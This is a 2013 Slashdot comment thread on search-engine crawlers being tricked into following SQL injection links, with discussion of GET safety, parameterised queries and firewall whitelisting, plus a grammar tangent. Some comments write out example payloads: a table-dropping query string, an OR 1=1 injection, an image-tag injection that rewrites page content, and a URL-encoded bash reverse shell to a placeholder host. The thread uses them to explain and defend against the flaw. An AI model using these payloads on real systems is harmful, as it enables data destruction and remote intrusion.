Google Security

Google Bots Doing SQL Injection Attacks 156

Posted by Soulskill
from the it's-not-a-bug,-it's-a-feature dept.
ccguy writes "It seems that while Google could really care less about your site and has no real interest in hacking you, their automated bots can be used to do the heavy lifting for an attacker. In this scenario, the bot was crawling Site A. Site A had a number of links embedded that had the SQLi requests to the target site, Site B. Google Bot then went about its business crawling pages and following links like a good boy, and in the process followed the links on Site A to Site B, and began to inadvertently attack Site B."

  • Doing a good deed for your competition by linking them from your site, hmm? :)

    • by Anonymous Coward on Tuesday November 05, 2013 @08:27PM (#45341301)

      TFA seems to place all the faults on Google.

      Fact is, Google is not the only one who is crawling the Net. Yahoo does it as well as Bing, among others.

      If the Google "bots" can be tricked into doing the "heavy lifting", so can the Yahoo "bots", Bing "bots", and "bots" from other search engines.

      • Why, it's not just bots! If you put a link out on a public web site, real people might even click on the link for you!

        Next you'll be suggesting that you could do that transparently to the user and have their browser re-use their already logged in session on another site to do things with their credentials for you!!!!

        What will they think of next? It's a good thing we have these wonderful stories to explain how this whole web thingy works with all its links and stuff...

        • by icebike (68054) on Tuesday November 05, 2013 @09:16PM (#45341627)

          Why, it's not just bots! If you put a link out on a public web site, real people might even click on the link for you!

          Real people don't have to click that link. Their computers and devices have web browsers that follow links ahead of time to
          improve browsing experience. Chrome calls this "Predict network actions to improve page load performance".

          But such hits would come from a wide variety of IPs, not from Google.

        • by mysidia (191772)

          Why, it's not just bots! If you put a link out on a public web site, real people might even click on the link for you!

          Why not just include an iframe, and have an onload javascript of the parent page navigate the iframe to various links?

          • by _Sharp'r_ (649297)

            Exactly. That's the sort of thing I mean by "transparently to the user". Sorry if my sarcasm was too obscure.

        • by Anonymous Coward

          I scrolled a couple of pages down, but didn't see any SQL injection attack links. WHAT IS WRONG WITH YOU SLASHDOT?!

        • Why, it's not just bots! If you put a link out on a public web site, real people might even click on the link for you!

          This is actually very useful for more persistent attacks.

          1. Site A and Site B have both SQL injection vulnerabilities
          2. Site A is the real target, and site B is a high traffic site getting lots of visitors
          3. Site B somehow gets an <img width=1 height=1 src="http://www.site-a.com/cms?id=%3Bupdate content set text%3D'%3Cimg src%3D%22http://goatse.fr/hello.jpg%22%3E"--> tag added somewhere in its content
          4. Random visitor visits site B, visitor's browsers attempts to fetch the 1x1 pixel from site A
          5. Site A now looks
          • by _Sharp'r_ (649297)

            If they know what URL is being called to cause the problem, Site B might be able to figure out Site A from logs for the clients that include the Referer in their request for it, but once they've identified the URL itself, they can just fix the actual vulnerability or block that specific URL with a redirect or something similar.

            Once I found a major party's official state website allowed anyone to post and execute arbitrary PHP with full access via just filling in a comment text field, I stopped being surprise

      • by aztracker1 (702135) on Tuesday November 05, 2013 @08:48PM (#45341439) Homepage
        What's funny is Bing has bots that will actually execute and follow through JavaScript requests... Last year, I worked to refactor our link structure (normalizing, and reducing variance), and this caused a reindex of the site (about 50k URLs). However, Bing bots went nuts, and because they executed JS, this really affected our unique visitors on our Google Analytics (they don't actually filter bots). It looked like our unique visitors went up by 40% (all from 3 locations, all Microsoft), while our pages per visit plummeted. Bots are necessary, but can be dangerous if you don't account for them.
      • TFA seems to place all the faults on Google.

        Fact is, Google is not the only one who is crawling the Net. Yahoo does it as well as Bing, among others.

        If the Google "bots" can be tricked into doing the "heavy lifting", so can the Yahoo "bots", Bing "bots", and "bots" from other search engines.

        Do not forget the NSA bots. The Chinese NSA equiv bots.
        The French NSA equiv bots....
        The FBI bots....

  • could not care less (Score:5, Informative)

    by Anonymous Coward on Tuesday November 05, 2013 @08:22PM (#45341269)

    not just "could care less". Sheeesh.

    • by Anonymous Coward on Tuesday November 05, 2013 @08:47PM (#45341425)

      Means the same thing irregardless.

      • by Anonymous Coward

        Means the same thing irregardless.

        I see what you did there.

      • by Anonymous Coward

        Means the same thing irregardless.

        Do you mean literally the same, or actually the same?

    • by JanneM (7445)

      Wouldn't be at all surprised if they do care just a little bit, making the original correct and yours not.

    • by sootman (158191) on Tuesday November 05, 2013 @11:40PM (#45342363) Homepage Journal

      It's probably laziness, but it could also be a shortened version of "I could care less, but I'd have to try."

      "Sure as hell" and "sure as shit" have no meaning either, right? How sure is hell, or shit? Those are shortened versions of "as sure as hell is hot" and "as sure as shit stinks". Language happens.

      I'm more concerned with errors on non-idiomatic speech, like "should of" and "could of" instead of "should have" and "could have", "try and" instead of "try to", and #1 on my list, "literally" meaning "figuratively".

      After we sort that out, we can come to an agreement on split infinitives, the Harvard comma, and whether punctuation that isn't part of a quote should be inside quotation marks or out. :-)

      • It becomes a problem when the literal meaning is the exact reverse of the intended meaning. "Sure as hell" does not have another meaning. For natives that is no problem. Non natives have more trouble with this and I am sure I don't need to remind you that most people do not have English as their mother language.

        In a similar case I actually had a supplier put a line on a quote that translates to: "all products are available from stock if another date is mentioned in the line". What they meant was: "all pr
      • by GodGell (897123) on Wednesday November 06, 2013 @04:36AM (#45343241) Homepage

        I'm more concerned with errors on non-idiomatic speech, like "should of" and "could of" instead of "should have" and "could have"

        THIS, a thousand times this!
        I'm not much of a grammar nazi, as I view communication to be the primarry purpose of text and not syntax... but "should of" actively takes chunks out of my brain every time I read it. It honestly makes me feel like I'm trying to talk to a retard, it just makes so little sense.

        The worst part is, while currently it's almost exclusively native English speakers who make this mistake (which is pretty odd), soon enough people like me who learnt by practice are going to start using it en masse, and then it'll be here to stay (like "could care less" - another one perpetuated by native speakers, btw).

        • What about "try and do something" instead of try to? Seems to me try and is as common as should of.
        • I agree, "should of" must be avoided at all cost. He coulda used "shoulda" instead of "should of", it's a much more elegant solution.

          And before anyone gets started, yes, the damn punctuation should go outside the quotation marks, because that's where logic (not to mention everyone outside of America) requires it to be! Deal with it.

        • by mcgrew (92797) *

          I don't so much mind the ones that mark the writer as an idiot* so much as the ones that change the meaning of what the idiot was trying to convey. "Writing in Python will make you loose your mind." Well, isn't setting your mind free a GOOD thing?

          I have to laugh at a post that tries to be erudite by using "whom" (usually incorrectly) but doesn't know the difference between there, their, and they're. Those kinds of aliteracies really slow my reading down.

          As to being native speakers, I corrected a fellow here

          • by GodGell (897123)

            I have to laugh at a post that tries to be erudite by using "whom" (usually incorrectly) but doesn't know the difference between there, their, and they're. Those kinds of aliteracies really slow my reading down.

            Yes, those are probably even worse... It makes me wonder how they were taught to write English. Nowadays you almost semi-automatically pick up on English just by hanging on the Internet a lot of the time, even if you've never met a native English speaker. One would expect grammar to be improved by it as well, but apparently not...

            By the way, I learned two new words from your post, thanks :)

      • by gsslay (807818)

        "Sure as hell" and "sure as shit" have no meaning either, right?

        Well that's the point. Because they are totally meaningless as they stand, you know to look elsewhere to find the meaning. But omitting a "not" does not make "could care less" meaningless. It means something very definite, and the exact opposite of what is intended.

        The idea that it's a shortened version doesn't stand up. It simply isn't said that way with the required intonation or timing. People say it because the phrase has become a meaningless, something said without any thought to what it breaks d

  • Uhh... (Score:5, Insightful)

    by Anonymous Coward on Tuesday November 05, 2013 @08:23PM (#45341273)

    If you have http GET requests going (effectively) straight into your database, that's YOUR problem, not Google's.

    • Re: (Score:3, Informative)

      by Anonymous Coward

      I whole heartedly agree. Database programming 101: you cannot trust any inputs (user or otherwise). You must assume that any input is malicious and sanitize it as such. Maybe the devs that are researching/complaining about this should consider the target as the problem not the 12,000 different ways to input malicious code.

      • by Salgat (1098063)
        You still have to assume we're in a non-ideal world, which is very much true. Suppose there is a way to mitigate this issue on Google's end, is there something wrong with taking action to reduce the amount of attacks, even if the website is at fault?
        • Re: (Score:2, Insightful)

          by Anonymous Coward

          Suppose there is a way to mitigate this issue on Google's end, is there something wrong with taking action to reduce the amount of attacks, even if the website is at fault?

          Yes, there is something "wrong"- Google has no idea what is or is not a "malformed" request. You're basically asking Google to sanitize the database input, which is generally not possible if you don't know anything about what the database should or should not accept. adding something along the lines of 'user=root' or 'page=somekindofdata' to a query may be perfectly legitimate for one site, and a massive problem for a different one.

          • by Salgat (1098063)
            That's why I said "if there is a way". Obviously if it isn't feasible then they can't do anything about it.
      • by Anonymous Coward

        You must assume that any input is malicious and sanitize it as such.

        Not even that. For many text fields, e.g. the Slashdot comment field, SQL statements can be a completely valid input. I could be explaining to someone how to solve a problem in SQL, or I could be re-posting a "Little Bobby Tables" joke. All very valid, nothing malicious.

        Seeing SQL input (or Javascript, same problem) as malicious results in people writing filters that prevent posting answers to SQL (or Javascript) related questions. Seeing it

        • Not even that. For many text fields, e.g. the Slashdot comment field, SQL statements can be a completely valid input. I could be explaining to someone how to solve a problem in SQL, or I could be re-posting a "Little Bobby Tables" joke. All very valid, nothing malicious.

          I'd say it depends on the page's content. I really can't think of a valid reason for SQL statements or Javascript snippets in pages dealing about celebrity A or pet B or most other fields of interest outside of IT.

    • by Hoch (603322)
      Well, your SQL Database is secure, but you have an overzealous application firewall that starts blocking requests from google because they are sending SQLi and other detritus. Now your site blacklists Bing and Yahoo too. Soon you are out in the internet wilderness because you won't let any of the search engines into your site. Good luck with site promotion.
  • How is that news? Zalewski wrote a book on that years ago ("Silence on the wire")
  • by ChaseTec (447725) <chase@osdev.org> on Tuesday November 05, 2013 @08:27PM (#45341305) Homepage

    In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe".

    • by Anonymous Coward on Tuesday November 05, 2013 @08:30PM (#45341315)
      This is Slashdot. What do we know about GET HEAD methods?
    • by Zapotek (1032314)
      That doesn't really have much to do with anything. A lot of DB connection/query libraries allow stacked queries to be performed (i.e. more than one query, separated by ';'), so by appending your own SQL query (say, a DELETE one) via a vulnerable input you can still do plenty of damage, even via a GET method.

      TFA isn't newsworthy in my opinion, this has been known for a while now.
      • The problem with this line of thinking is that spiders are only supposed to crawl links. If you use a live link without authentication, shame on you. If you use a query to a db for something like a parts catalog that's capable of r/w, then shame on you. If you tether your logic through a pipe, the pipe needs parser constraints on the query.

        Blaming Google or any other crawler-spider-bot, despite my other disdain for Google, is pointing the finger at the wrong culprit. Everyone wants sub-second response times
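The "capable of r/w" point above can be made concrete. A minimal sketch, assuming a SQLite file as a stand-in for the parts catalog (the table, file name, and helper `try_write` are all hypothetical): the public code path gets a read-only handle, so even a query that has been turned into a write is refused by the database itself.

```python
import os
import sqlite3
import tempfile
from pathlib import Path

# Hypothetical parts catalog, created once with a read/write connection.
db_path = os.path.join(tempfile.mkdtemp(), "catalog.db")
admin = sqlite3.connect(db_path)
admin.execute("CREATE TABLE catalog (id INTEGER PRIMARY KEY, name TEXT)")
admin.execute("INSERT INTO catalog (name) VALUES ('widget')")
admin.commit()
admin.close()

# The public-facing code path only ever gets a read-only handle.
reader = sqlite3.connect(Path(db_path).as_uri() + "?mode=ro", uri=True)

def try_write(conn):
    """Return the error message if the write is refused, else None."""
    try:
        conn.execute("DELETE FROM catalog")
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)

write_error = try_write(reader)  # the DELETE is rejected
rows = reader.execute("SELECT id, name FROM catalog").fetchall()  # reads still work
```

On a server database the rough equivalent would be a separate role with only SELECT rights for the catalog pages. It limits the damage from an injection; it does not remove the injection.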

        • by Zapotek (1032314)
          I'm not sure to which line of thinking you're referring, both myself and the GP just posted a technical remark each. Also (to my great joy and surprise) no-one is blaming Google (at least not yet) and rightly so.

          As for the back-end countermeasures you described, you are of course spot on, however it's safe to assume that if you're vulnerable to something as trivial and mundane as SQL injection, you won't have the required foresight to setup and use different DB roles, each with the absolutely least privs
          • Yes, we agree; it's the problem with blaming Google, and affirmation of the silliness. In my mind, which didn't get presented, and I apologize, is that query code has become awful, let-me-count-the-ways.

            Further, when I'm forced to, looking at page code makes me reel with revelation of the mindset of cut-and-paste APIs glued with mucilage (if it's that good). Everyone else now is to blame, not the moshpit of ducttaped code. Sorry, bad rant on a bad day.

        • If you want more performance, you should be using prepared statements and statement caching, not string concatenation to construct your queries.
          Then you don't need to waste CPU time and memory escaping input data.

      • by mysidia (191772)

        so by appending your own SQL query (say, a DELETE one) via a vulnerable input you can still do plenty of damage, even via a GET method.

        That would be a bug in the application.

        The HTTP spec doesn't let you say what could happen if there's a bug in the application. It could be designed so that all GETs are idempotent operations, but due to a bug they are not.

        For all I know; if there's a bug in the application adding ?X=FOOBAR&do=%2Fbin%2Fbash%20-i%20%3E%2Fdev%2Ftcp%2Fwww.example.com%2F80%200%3C%261

        • by Zapotek (1032314)
          I'd say that since half of the subject of this discussion is about SQL injection, the webapps in question are axiomatically buggy.
    • by d33tah (2722297)
      The trick is that retrieval can be dangerous by itself if you're using the database and forgot to sanitize your SQL. Being a moron can't be solved by an RFC.
    • by iONiUM (530420)

      Agreed 100%. This article is blaming Google for admins who had bad site design. Doing a GET should not have done this; it's their fault for embedding bad links in their HTML that is exposed to a crawler.

      • It's not the admins of the sites embedding the links that are the problem. They're the attackers. The fault lies with the admins of the sites the links point to.

    • by hawguy (1600213)

      In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe".

      That's the funny thing about SQL injection attacks - it can turn a SELECT into a DELETE or UPDATE. So you may have *meant* your GET request to be a simple retrieval, but a successful attack could make it do so much more.

      Which is a great segue to the obligatory xkcd comic!

      http://xkcd.com/327/ [xkcd.com]

  • In the scenario listed, if you were the hacker trying to cover his tracks, how would you ever know if the attack was successful or not?
    • by Fwipp (1473271)

      If your rival's site suddenly had a 99% sale on all products. :)

    • by gl4ss (559668)

      the site goes down. you can then guess it worked.
      or a port opens at the target host, whatever the attack did.

      as for using it for DOS, the target site doesn't even need to be faulty.

  • Skype too (Score:5, Interesting)

    by gmuslera (3436) on Tuesday November 05, 2013 @08:52PM (#45341463) Homepage Journal
    If Microsoft follows links shown in "private" skype conversations [slashdot.org] (and probably several NSA programs too) they could be used to attack sites this way. Could be pretty ironic to have government sites with their DBs wiped from a SQL attack coming from an NSA server.
  • I vaguely recall an article years ago on something like TheDailyWtf where some idiot webmaster wrote a web application with links instead of buttons to perform tasks, and was confused why his site and data was getting trashed repeatedly, until he figured out it was the crawling bots.

    This is nothing new: unskilled developers using the wrong methods and getting burned.

    • by PRMan (959735)
      And there was a DailyWTF article where he couldn't publish because you could literally put people on a state's Megan's Law sex offender database list by changing the query used on the site.
  • What is going on?
    It seems that while Google could really care less about your site and has no real interest in hacking you, their automated bots can be used to do the heavy lifting for an attacker.

    no, what's really happening is someone posted an injection url on a forum somewhere and googlebot ran across it. come on, google bot hasn't become sentient or som-SORRY THIS POST WAS A MISTAKE DISREGARD ALL INFORMATION.

  • by AndroSyn (89960) on Tuesday November 05, 2013 @09:39PM (#45341765) Homepage

    This guy (who I won't name, you know who you are) was once writing some PHP code for some webapp. Well, in the app, he had some delete links and he hadn't finished the authentication code apparently, so googlebot crawled his site, followed all of the delete links and completely wiped out his database.

    Of course, you can keep googlebot away from your crappy code with robots.txt too...

  • 'Someone failed at the most basic level here and it wasn't Google. From RFC 2616 (HTTP) Section 9.1 Safe and Idempotent Methods - "In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe"."', Matthieu Heimer
    • by Qzukk (229616)

      I don't get it. What's unsafe about "select * from catalog where id=".$_GET["id"]?

      • by Bengie (1121981)
        Separate your commands from your inputs. The query sent to the DB should never change, only the parameters; and the parameter values should never be part of the query.
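To illustrate "the query never changes, only the parameters": a minimal sketch using Python's built-in `sqlite3` module, with a made-up three-row `catalog` table. The two helper functions are hypothetical names, and the hostile input is the "0 OR 1=1" string mentioned elsewhere in this thread.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE catalog (id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO catalog (id, name) VALUES (?, ?)",
                 [(1, "widget"), (2, "gadget"), (3, "gizmo")])

def lookup_concatenated(raw_id):
    # Vulnerable: the input becomes part of the SQL text itself.
    return conn.execute("SELECT * FROM catalog WHERE id=" + raw_id).fetchall()

def lookup_parameterized(raw_id):
    # The SQL text is constant; the input travels separately as a value.
    return conn.execute("SELECT * FROM catalog WHERE id=?", (raw_id,)).fetchall()

hostile = "0 OR 1=1"
leaked = lookup_concatenated(hostile)   # WHERE clause is now always true
safe = lookup_parameterized(hostile)    # compared as a plain value, no match
```

With the concatenated version the whole table comes back; with the placeholder version the same input is just an id that matches nothing, and no escaping or filtering was needed to get there.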
      • by dkleinsc (563838)

        I can't tell if you're serious, so I'm going to act like you are in case you or some other reader doesn't understand the problem:
        In the URL that you'd be using to hit that page, change the "id=42" or whatever you have there to "id=0 OR 1=1". Poof, your page is now reading the entire catalog in rather than the single record you wanted to. Hit that fast enough, and if that catalog is large enough, and the bad guy may have just brought your nice database server to a screaming halt as it loads up 300 million re

      • Re: (Score:2, Funny)

        by mysidia (191772)

        I don't get it. What's unsafe about "select * from catalog where id=".$_GET["id"]?

        Dude... you forgot to encrypt your databases.... it should be

        $catalogname = str_rot13('catalog'); $idname = str_rot13('id');

        $id = str_replace(';', '', $id, ); ... "select * from $catalogname where $idname=".$id

        Make sure to insist that register_globals is set to On in the PHP settings for the web server.

      • by scdeimos (632778)

        Assuming you're actually serious, what happens when your page is requested with: ?id=0;%20drop%20table%20catalog;

        Suddenly your query gets transformed to: select * from catalog where id=0; drop table catalog;
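The transformation described just above can be reproduced without a database at all. A small sketch, assuming the server URL-decodes the parameter before the script sees it; `build_query` is a hypothetical stand-in for the PHP one-liner being discussed.

```python
from urllib.parse import unquote

def build_query(query_string):
    # Take everything after "id=", URL-decode it as a web server would,
    # and glue it onto the SQL text, exactly like the concatenation upthread.
    raw_id = unquote(query_string.split("id=", 1)[1])
    return "select * from catalog where id=" + raw_id

normal = build_query("id=42")
hostile = build_query("id=0;%20drop%20table%20catalog;")
```

Here `normal` is the intended single-row select, while `hostile` is the two-statement string quoted above. Whether the second statement actually runs depends on the driver allowing stacked queries, as noted elsewhere in the thread, but the SQL text has been rewritten by the requester either way.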

      • by Megane (129182)

        Because Little Bobby Tables. [xkcd.com]

        http://your.site/dumbass.php?id=10; DROP TABLE catalog; --

  • by ghn (2469034) on Tuesday November 05, 2013 @10:07PM (#45341891)

    The point is not that you can attack a lousy website using GET requests. The idea is that HTTP firewalls should not blatantly white-list Google bots and other website crawlers for the sake of SEO, because Google bot will follow malicious links from other websites.

    So let's say you have a filter with rules that prevent common SQL injections in GET request parameters. This is a weak security practice but can be useful to mitigate some 0-day attacks on vulnerable scripts. This protection can be bypassed IF you white-listed Google bot.
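The bypass can be sketched in a few lines. Everything here is hypothetical and deliberately crude (the pattern, the function names, the User-Agent check); it only shows the shape of the problem, not how any real application firewall works.

```python
import re

# Hypothetical, deliberately crude rule set; real filters are far more involved.
SQLI_PATTERN = re.compile(r"(;|--|\bunion\b|\bdrop\b|\bor\s+1=1\b)", re.IGNORECASE)

def looks_like_sqli(query_string):
    return bool(SQLI_PATTERN.search(query_string))

def allow_with_whitelist(user_agent, query_string):
    # Bypassable: anything identified as the crawler skips inspection.
    if "Googlebot" in user_agent:
        return True
    return not looks_like_sqli(query_string)

def allow_without_whitelist(user_agent, query_string):
    # Every request is inspected, crawler or not.
    return not looks_like_sqli(query_string)

payload = "id=0; drop table catalog; --"
```

Note that in the scenario described here the request really does come from the crawler, so checking that the client is a genuine Google bot would not help; the whitelist itself is the hole. Rejecting the single bad request rather than banning the crawler also sidesteps the blacklisting worry raised upthread.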

    • by Anonymous Coward

      If you think you need "a filter with rules that prevent common SQL injections in GET requests parameters", then you're doing something wrong.

      I know, I know -- protection in depth and all that. But some things are just too fucking ugly to even think of them. Ugh

  • So if you litter a page with malicious links, the attacks will look like they're coming from Google's servers.

    That's kind of cool, actually.

    I'd laugh my head off if Google were subsequently flagged as a malicious site. I *hate* bots.

  • by sootman (158191) on Tuesday November 05, 2013 @11:52PM (#45342419) Homepage Journal

    When I first started doing web apps, I made a basic demo of a contacts app and used links for the add, edit, and delete functions. One day I noticed all the data was gone. I figured someone had deleted it all for fun so I went in to restore from a backup and decided to look at the logs and see who it was. It was googlebot -- it had come walking through, dutifully clicking on every "delete" and "are you sure?" link until the content was gone.

    (I knew about when to use GET versus POST -- it was just easier to show what was happening when you could mouse over the links and see the actions.)

  • is awesome.
  • Someone wrote a terrible web app, it could be attacked with simple GET requests. Someone else made those requests, but it was still a terrible web app. Nobody cares.
    • by Megane (129182)

      Someone wrote a terrible web app, it could be attacked with simple GET requests. Someone else made those requests, but it was still a terrible web app. And nothing of value was lost.

      FTFY.

      • by ttucker (2884057)

        Someone wrote a terrible web app, it could be attacked with simple GET requests. Someone else made those requests, but it was still a terrible web app. And nothing of value was lost.

        FTFY.

        I do like that better. Thank you.

  • You'd have thought they learned their lesson when dealing with Bobby Tables, aka "Robert'); DROP TABLE Students;--"
  • So they do care a bit then?

    The Caring Continuum - http://incompetech.com/Images/caring.png [incompetech.com]

  • In several cases, the SQLi target was posted in a hacking forum, blog or exploit site, then Google bots perform a request to the link and indexes it (title, content).
  • My god, it's 2013 and we're talking about SQL injection? If you're not parameterizing your SQL, you're doing it wrong.

  • "couldn't care less"
    If you could care less it would not really be worth mentioning.

  • Even if you don't bother to edit your robots.txt file, I believe you can curtail this phenomenon by using POST rather than GET for links that change data
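A rough sketch of that idea, using a made-up in-memory contacts app rather than any real framework (`handle`, the paths, and the data are all hypothetical): the delete action only responds to POST, so a crawler that follows links with GET gets a 405 and changes nothing.

```python
contacts = {1: "Alice", 2: "Bob"}  # hypothetical in-memory data

def handle(method, path):
    """Return an HTTP status code for a tiny, made-up contacts app."""
    if path.startswith("/contacts/delete/"):
        if method != "POST":
            return 405  # Method Not Allowed: link-following crawlers stop here
        contacts.pop(int(path.rsplit("/", 1)[1]), None)
        return 303      # redirect back to the list after the change
    if method in ("GET", "HEAD") and path == "/contacts":
        return 200      # pure retrieval, safe to crawl
    return 404

crawler_status = handle("GET", "/contacts/delete/1")   # what a bot would send
after_crawl = dict(contacts)                            # snapshot: nothing deleted
user_status = handle("POST", "/contacts/delete/1")     # a real form submission
```

This only keeps well-behaved GET traffic from changing data. It is not a substitute for authentication, and it does nothing for a read query that is itself injectable.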
